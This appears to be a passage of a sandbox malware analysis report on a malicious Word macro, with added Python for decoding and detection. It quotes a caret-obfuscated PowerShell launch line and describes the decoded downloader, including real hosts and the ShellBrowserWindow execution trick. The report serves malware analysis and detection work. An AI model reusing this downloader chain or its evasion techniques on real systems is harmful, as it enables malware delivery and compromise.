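# Constructed stand-in for the shape's AlternativeText (the real text is not
# in the report).  A harmless -EncodedCommand is staged the way the macro
# expects: base64 of UTF-16LE, with every "A" swapped for "[".
BENIGN_COMMAND = "Write-Host 'triage'"
ENCODED = base64.b64encode(BENIGN_COMMAND.encode("utf-16le")).decode("ascii")
SAMPLE_ALT_TEXT = "powershell -nop -w hidden -e " + ENCODED.replace("A", "[")


def recover_command(alt_text: str) -> str:
    """Emulate "CmD /C " + Trim(Replace(AlternativeText + "", "[", "A")).
    The other string variables in the Shell call are empty, so they add
    nothing."""
    return "CmD /C " + alt_text.replace("[", "A").strip()


# -e, -ec, -enc and -encodedcommand are all accepted by powershell.exe.
ENC_ARG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)',
                     re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Decode the -EncodedCommand argument the way PowerShell does:
    base64, then UTF-16LE."""
    m = ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument in command line")
    return base64.b64decode(m.group(1)).decode("utf-16le")


if __name__ == "__main__":
    for line in strip_junk(MACRO_EXCERPT):
        print(line)
    cmd = recover_command(SAMPLE_ALT_TEXT)
    print(cmd)
    print(decode_encoded_command(cmd))
```

Run against the full macro text, strip_junk() reduces the routine to the handful of lines that do work; the same "[" for "A" substitution explains why the AlternativeText of an embedded shape, rather than the macro itself, carries the payload.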

            Streams

            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:\x1CompObj
            File Type:data
            Stream Size:114
            Entropy:4.2359563651
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
            General
            Stream Path:\x5DocumentSummaryInformation
            File Type:data
            Stream Size:4096
            Entropy:0.443882389207
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . X . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M r . G r a n v i l l e M c G l y n n . . . . . . . . . . . G r a d y - A d a m s R u s t y M c G l y n n . . . . . . . . \\ . . . . . .
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 58 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 0e 00 00 00 80 00 00 00 0f 00 00 00 a0 00 00 00 04 00 00 00 c4 00 00 00 05 00 00 00 cc 00 00 00 06 00 00 00 d4 00 00 00 11 00 00 00 dc 00 00 00 17 00 00 00 e4 00 00 00 0b 00 00 00 ec 00 00 00
            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
            General
            Stream Path:\x5SummaryInformation
            File Type:data
            Stream Size:4096
            Entropy:0.770456390779
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . L . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . N e t w o r k e d m u l t i - s t a t e p r o j e c t i o n . . . . . . . . . . . . W e s t
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 dc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 c4 00 00 00 04 00 00 00 e4 00 00 00 05 00 00 00 00 01 00 00 06 00 00 00 0c 01 00 00 07 00 00 00 3c 01 00 00 08 00 00 00 4c 01 00 00 09 00 00 00 6c 01 00 00
            Stream Path: 1Table, File Type: data, Stream Size: 13859
            General
            Stream Path:1Table
            File Type:data
            Stream Size:13859
            Entropy:4.98438163064
            Base64 Encoded:True
            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
            Stream Path: Data, File Type: data, Stream Size: 33430
            General
            Stream Path:Data
            File Type:data
            Stream Size:33430
            Entropy:7.67657311196
            Base64 Encoded:True
            Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . $ m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . b . . . . A . . . . . . J . . . . . . . . . . . . . . . 9 . 9 . 6 . e . 2 . e . c . d . - . 4 . 5 . c . f . - . 4 . b . c . d . - . 8 . d . a . 8 . - . 1 . 9 . 9 . f . b . 2 . a . b . 9 . 7 . 3 . f . . . . . . . . . . . . . . . R . . . . . . . . . . N . . . . . W " . . . Z . . . . . . . . . . . . . D . . . . . . . . F
            Data Raw:96 82 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 09 24 6d 0b e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 86 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 62 00 00 00 04 41 01 00 00 00 05 c1 4a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 39 00 39 00
            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 365
            General
            Stream Path:Macros/PROJECT
            File Type:ASCII text, with CRLF line terminators
            Stream Size:365
            Entropy:5.31281711862
            Base64 Encoded:True
            Data ASCII:I D = " { 1 D A 1 2 6 7 B - F E 9 0 - 4 9 5 0 - 8 5 7 4 - 9 8 C 8 C 4 9 9 C 0 8 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 B 7 9 B 2 3 4 2 C 3 8 2 C 3 8 2 C 3 8 2 C 3 8 " . . D P B = " F 1 F 3 3 8 B D 3 9 B D 3 9 B D " . . G C = " 6 7 6 5 A E 5 8 5 2 B 8 C 9 B 9 C 9 B 9 3 6 " . . . . [ H o s t E x t e n d e r I n f o ] . .
            Data Raw:49 44 3d 22 7b 31 44 41 31 32 36 37 42 2d 46 45 39 30 2d 34 39 35 30 2d 38 35 37 34 2d 39 38 43 38 43 34 39 39 43 30 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
            General
            Stream Path:Macros/PROJECTwm
            File Type:data
            Stream Size:41
            Entropy:3.07738448508
            Base64 Encoded:False
            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5460
            General
            Stream Path:Macros/VBA/_VBA_PROJECT
            File Type:data
            Stream Size:5460
            Entropy:5.24158976541
            Base64 Encoded:False
            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
            Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
            General
            Stream Path:Macros/VBA/dir
            File Type:data
            Stream Size:513
            Entropy:6.24664802112
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . o ; ^ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
            Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 b9 6f 3b 5e 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
            Stream Path: MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Item, File Type: XML 1.0 document, ASCII text, with very long lines, with no line terminators, Stream Size: 306
            General
            Stream Path:MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Item
            File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
            Stream Size:306
            Entropy:5.08740844904
            Base64 Encoded:False
            Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > < b : S o u r c e s x m l n s : b = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " x m l n s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " S e l e c t e d S t y l e = " \\ A P A S i x t h E d i t i o n O f f i c e O n
            Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 3c 62 3a 53 6f 75 72 63 65 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f 72 67 2f 6f 66 66 69 63 65 44 6f 63 75 6d 65 6e 74 2f 32 30 30 36 2f
            Stream Path: MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Properties, File Type: XML 1.0 document, ASCII text, with CRLF line terminators, Stream Size: 341
            General
            Stream Path:MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Properties
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Stream Size:341
            Entropy:5.25175142912
            Base64 Encoded:True
            Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > . . < d s : d a t a s t o r e I t e m d s : i t e m I D = " { 1 8 5 7 8 D 9 D - B 5 D B - 4 2 8 D - 9 6 E E - E 2 1 2 7 0 1 2 A D C 3 } " x m l n s : d s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / c u s t o m X m l " > < d s : s c h e m a R e f s > < d s : s c h e m a R e f d s : u r i = " h t t p : / / s c h e m a s . o p e n
            Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0d 0a 3c 64 73 3a 64 61 74 61 73 74 6f 72 65 49 74 65 6d 20 64 73 3a 69 74 65 6d 49 44 3d 22 7b 31 38 35 37 38 44 39 44 2d 42 35 44 42 2d 34 32 38 44 2d 39 36 45 45 2d 45 32 31 32 37 30 31 32 41 44 43 33 7d 22 20 78 6d 6c
            Stream Path: WordDocument, File Type: data, Stream Size: 4096
            General
            Stream Path:WordDocument
            File Type:data
            Stream Size:4096
            Entropy:1.31946833917
            Base64 Encoded:False
            Data ASCII:. . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x e . a x e . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:ec a5 c1 00 57 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 16 08 00 00 0e 00 62 6a 62 6a 1a 0f 1a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 78 65 fc 61 78 65 fc 61 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

            Network Behavior

            TCP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 12, 2021 20:55:02.622648954 CET | 49165 | 80 | 192.168.2.22 | 176.32.35.16
            Nov 12, 2021 20:55:02.684305906 CET | 80 | 49165 | 176.32.35.16 | 192.168.2.22
            Nov 12, 2021 20:55:02.684464931 CET | 49165 | 80 | 192.168.2.22 | 176.32.35.16
            Nov 12, 2021 20:55:02.686345100 CET | 49165 | 80 | 192.168.2.22 | 176.32.35.16
            Nov 12, 2021 20:55:02.745944977 CET | 80 | 49165 | 176.32.35.16 | 192.168.2.22
            Nov 12, 2021 20:55:02.746126890 CET | 80 | 49165 | 176.32.35.16 | 192.168.2.22
            Nov 12, 2021 20:55:02.780746937 CET | 49165 | 80 | 192.168.2.22 | 176.32.35.16

            UDP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 12, 2021 20:55:02.478624105 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
            Nov 12, 2021 20:55:02.587711096 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Nov 12, 2021 20:55:02.478624105 CET | 192.168.2.22 | 8.8.8.8 | 0x24f0 | Standard query (0) | fpetraardella.band | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Nov 12, 2021 20:55:02.587711096 CET | 8.8.8.8 | 192.168.2.22 | 0x24f0 | Name error (3) | fpetraardella.band | none | none | A (IP address) | IN (0x0001)

            HTTP Request Dependency Graph

            • 176.32.35.16

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.2249165176.32.35.1680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampkBytes transferredDirectionData
            Nov 12, 2021 20:55:02.686345100 CET0OUTGET /704e.php HTTP/1.1
            Host: 176.32.35.16
            Connection: Keep-Alive
            Nov 12, 2021 20:55:02.746126890 CET0INHTTP/1.1 404 Not Found
            Server: nginx/1.16.1
            Date: Fri, 12 Nov 2021 19:55:02 GMT
            Content-Type: text/html
            Content-Length: 153
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


            Code Manipulations

            Statistics

            CPU Usage

            Memory Usage

            High Level Behavior Distribution

            Behavior
            System Behavior

            General

            Start time:20:55:11
            Start date:12/11/2021
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f740000
            File size:1423704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:20:55:13
            Start date:12/11/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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
            Imagebase:0x4aa10000
            File size:345088 bytes
            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, Author: Florian Roth
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, Author: Florian Roth
            Reputation:high

            General

            Start time:20:55:14
            Start date:12/11/2021
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand 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
            Imagebase:0x13f570000
            File size:473600 bytes
            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high
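The three process entries above form the chain WINWORD.EXE -> cmd.exe -> powershell.exe: the cmd.exe line hides the POWERSHELL keyword and its switches behind '^' escapes (the SUSP_PowerShell_Caret_Obfuscation_2 hits), cmd.exe strips them so that powershell.exe receives B^ypass, and both lines end in -encodedcommand followed by a base64 blob. The Python below is an added example, not part of the Joe Sandbox report, that runs the three checks a detection engineer would write for this chain over constructed process-creation events modelled on the listing. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the events themselves, the stand-in base64 payload (the real blob is elided in this export), the rule names and the caret threshold are assumptions. The caret check is a count-based stand-in for the Yara rule, not a copy of it.

```python
import base64
import re
from typing import Dict, List

# Image names that make the parent/child pairing suspicious (assumption: extend per environment)
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
BASE64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
CARET_THRESHOLD = 5  # assumption: legitimate cmd.exe lines rarely carry more than a few '^'


def image_name(path: str) -> str:
    """Lower-case file name of an image path such as C:\\Windows\\System32\\cmd.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_encoded_flag(token: str) -> bool:
    """True for -e, -ec and any prefix of -EncodedCommand that powershell.exe accepts."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name in ("e", "ec") or (len(name) >= 2 and "encodedcommand".startswith(name))


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the checks that fire for one process-creation event."""
    hits: List[str] = []
    parent = image_name(event.get("ParentImage", ""))
    image = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    tokens = cmdline.split()

    # 1. An Office application spawning a shell or script host. Direct parent only:
    #    the powershell.exe child here has cmd.exe as parent and needs ancestry to link back.
    if parent in OFFICE_IMAGES and image in SHELL_IMAGES:
        hits.append("office_spawns_shell")

    # 2. PowerShell started with -EncodedCommand (or an accepted prefix) and a base64-looking token
    if image in ("powershell.exe", "pwsh.exe"):
        for flag, arg in zip(tokens, tokens[1:]):
            if is_encoded_flag(flag) and BASE64_TOKEN.match(arg):
                hits.append("encoded_powershell")
                break

    # 3. cmd.exe lines stuffed with '^' escapes (P^O^W^E^R^S^H^E^L^L ...)
    if image == "cmd.exe" and cmdline.count("^") >= CARET_THRESHOLD:
        hits.append("caret_obfuscation")
    return hits


def encoded_command(script: str) -> str:
    """What powershell -EncodedCommand expects: base64 of the script in UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events modelled on the report's process listing. The real base64
# blob is elided in the report, so a harmless stand-in script is encoded instead.
STAND_IN = encoded_command('Write-Host "stand-in for the elided payload"')
SAMPLE_EVENTS = [
    {"ParentImage": "",  # parent of WINWORD.EXE is not shown in the report
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy "
                    "B^^^yp^ass -encodedcommand " + STAND_IN},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand " + STAND_IN},
]


def triage(events: List[Dict[str, str]]) -> List[List[str]]:
    """Run detect() over a list of events and return one hit list per event."""
    return [detect(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{image_name(event['Image']):16} {hits}")
```

Run stand-alone it prints the hits per process: nothing for WINWORD.EXE (its parent is not in the report), office_spawns_shell and caret_obfuscation for cmd.exe, encoded_powershell for powershell.exe. The tokenising approach deliberately does not un-escape carets: on the cmd.exe line the keyword is obfuscated but -encodedcommand is not, and on the powershell.exe line cmd.exe has already removed the carets, so the encoded-command check is applied to the child's own command line.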

            Disassembly

            Code Analysis

            Call Graph

              AutoOpen (line 9; entrypoint, executed) -> Replace:1, Len:78, Trim:43, LTrim:1, LenB:39, ChrW:78, RTrim:1

            Module: ThisDocument

            Declaration

              Line  Content
               1    Attribute VB_Name = "ThisDocument"
               2    Attribute VB_Base = "1Normal.ThisDocument"
               3    Attribute VB_GlobalNameSpace = False
               4    Attribute VB_Creatable = False
               5    Attribute VB_PredeclaredId = True
               6    Attribute VB_Exposed = True
               7    Attribute VB_TemplateDerived = True
               8    Attribute VB_Customizable = True

            Executed Functions

              AutoOpen (ThisDocument)
                APIs: CBool, Len, ChrW, LenB, Trim, LTrim, RTrim, Shapes, AlternativeText, Replace, Shell#, CInt, plus 78 reads of undeclared variables (WifblkBfDS, lZlRjJlQKnBntw, pWNDRZbLZdGgl, SxZnBTiJkRBD, ...) that occur only as operands of the junk lines in the listing below
                Meta Information: every Len(ChrW(a) + ChrW(b)) call -> 2 and every Len(<undeclared variable>) -> 0 (the trace repeats Len("..") -> 2 Len() -> 0 for each of the 39 junk lines); the Replace() input and output are reproduced in full at line 80 of the listing

            Strings
              "" (empty string, 6 occurrences)
              "h9mkae7"
              "CmD /C "

            Decrypted Strings
              (none)
            Executed Functions: AutoOpen (ThisDocument)

            The macro is a single AutoOpen handler, so it runs as soon as macros are enabled. Of the 50 listed lines, 39 are junk arithmetic over undeclared variables: each Len(ChrW(a) + ChrW(b)) term evaluates to 2 and each Len(<undeclared variable>) to 0, as the meta information records, and none of the results is used again. Six more lines assign empty strings whose variables are spliced into the Shell string as invisible padding. Three lines carry the payload. Line 76 fetches the shape named "h9mkae7"; line 80 takes that shape's AlternativeText, replaces every "[" with "A" and hands the result to VBA.Shell with window style CInt(351 * 2 + - 702) = 0 (vbHide), so no cmd.exe window is shown. The AlternativeText is the caret-obfuscated cmd.exe line reproduced in the Replace() trace under line 80, and its -encodedcommand argument is base64 of a UTF-16LE PowerShell script. Decoding that argument (undo the "[" -> "A" swap, base64-decode, read as UTF-16LE) gives a script that obtains a System.Net.WebClient through [System.Activator]::CreateInstance, locates DownloadString and DownloadData by iterating GetMethods() so that neither method name appears as a direct call, runs IEX on the body of http://176.32.35.16/704e.php, writes the response of http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas to <CommonApplicationData>\QdZGP.exe with [System.IO.File]::WriteAllBytes, and launches that file through ShellExecute on the COM object for CLSID C08AFD90-F2A1-11D1-8455-00A0C91F3880 (ShellBrowserWindow), a technique that makes explorer.exe rather than powershell.exe the dropped file's parent. Neither download succeeded in this analysis (404 and NXDOMAIN in the network section), so the drop and execution stages were not observed.

              Line  Instruction
                    [Meta Information]

                9   Sub AutoOpen()
               10   On Error Resume Next
                    [executed]
